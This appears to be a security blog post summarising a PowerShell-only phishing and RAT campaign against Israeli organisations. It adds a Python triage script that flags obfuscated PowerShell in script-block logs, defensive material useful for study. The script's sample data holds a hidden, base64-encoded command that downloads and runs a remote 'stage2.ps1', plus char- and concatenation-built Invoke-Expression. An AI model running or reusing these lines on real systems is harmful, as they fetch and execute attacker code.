The Fortinet/FortiMail Workspace Security team recently identified a targeted intrusion campaign impacting multiple Israeli organizations. The adversary leveraged compromised internal email infrastructure to distribute phishing messages across the regional business landscape. These emails initiated a multi-stage, PowerShell-based infection chain that culminated in the delivery of a remote access trojan (RAT), executed entirely through PowerShell.
Key characteristics include:
- Full PowerShell-based delivery chain requiring no external executables
- Obfuscated payloads retrieved from actor-controlled infrastructure
- Evidence of lateral movement and surveillance activity
- Potential overlap with MuddyWater campaigns, but attribution remains inconclusive
The following report outlines technical observations from the campaign, including delivery tactics, obfuscation methods, C2 activity, and MITRE ATT&CK mappings.
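Because the chain described above runs entirely in PowerShell and pulls obfuscated payloads from remote infrastructure, one practical defensive check is to triage PowerShell script-block log entries (Windows event ID 4104 when Script Block Logging is enabled) for encoded commands, download cradles, and string-building obfuscation. The script below is an added illustration written for this post, not detection logic from the Fortinet report: the pipe-delimited event format, the indicator names and weights, the threshold, the host names and the IP address are all constructed for the example.

```python
"""Score PowerShell script-block log lines for download-cradle and
obfuscation indicators (added example; event format, weights and
sample data are constructed, not taken from the report)."""
import base64
import re

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Weighted indicators; names and weights are assumptions for this example.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile", re.compile(r"-no(?:p|profile)\b", re.I), 1),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("download_cradle", re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest"
        r"|invoke-restmethod|start-bitstransfer", re.I), 3),
    ("base64_decode", re.compile(r"frombase64string", re.I), 2),
    ("char_obfuscation", re.compile(r"\[char\]\s*\d+", re.I), 2),
    ("string_concat", re.compile(r"(?:'[^']*'\s*\+\s*){3,}"), 2),
]


def decode_encoded_command(script):
    """Return (script with the blob masked, decoded command or None).
    powershell.exe expects the blob to be base64 of UTF-16LE text."""
    m = ENC_ARG.search(script)
    if not m:
        return script, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return script, None
    # Mask the blob so its random-looking characters cannot trip indicators.
    return script.replace(m.group(1), "<base64>"), decoded


def normalise(text):
    """Cheap de-obfuscation: resolve [char]N and join 'a' + 'b' literals so
    a command assembled at runtime becomes visible to literal matching."""
    text = re.sub(r"\[char\]\s*(\d+)",
                  lambda m: "'" + chr(int(m.group(1)) % 0x110000) + "'",
                  text, flags=re.I)
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != text:  # repeat until no adjacent literals remain
        prev = text
        text = concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def analyse_event(line):
    """Parse one constructed 'event_id|host|script' line and score it."""
    _event_id, host, script = line.split("|", 2)
    masked, decoded = decode_encoded_command(script)
    raw = masked + ("\n" + decoded if decoded else "")
    # Scan both the raw text (to credit obfuscation itself) and its
    # normalised form (to catch what the obfuscation was hiding).
    haystack = raw + "\n" + normalise(raw)
    hits = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"host": host, "score": score, "hits": hits, "decoded": decoded}


def triage(lines, threshold=5):
    """Return the events whose score reaches the (assumed) alert threshold."""
    return [r for r in (analyse_event(ln) for ln in lines) if r["score"] >= threshold]


def _enc(cmd):
    # Build an -EncodedCommand argument the same way an operator would.
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample events: two benign, one encoded cradle, one char/concat build.
SAMPLE_EVENTS = [
    "4104|ws01|Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "4104|ws02|powershell.exe -nop -w hidden -enc "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"),
    "4104|ws03|$s = 'Inv' + 'oke-' + 'Expr' + 'ession'; "
    "$p = [char]73 + [char]69 + [char]88; & $s $p",
    "4104|ws04|Get-Service | Where-Object Status -eq 'Running'",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["host"], r["score"], ", ".join(r["hits"]))
```

The normalisation step is deliberately minimal; it exists to show why matching on literal strings such as `IEX` is not enough when the command is assembled from `[char]` values or concatenated fragments, which is exactly the kind of obfuscation a PowerShell-only chain relies on. In production this logic belongs in the SIEM's detection rules over the real 4104 event fields rather than in a stand-alone script.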
Link to full report: IR-25-224-001_Phishing Msgs.pdf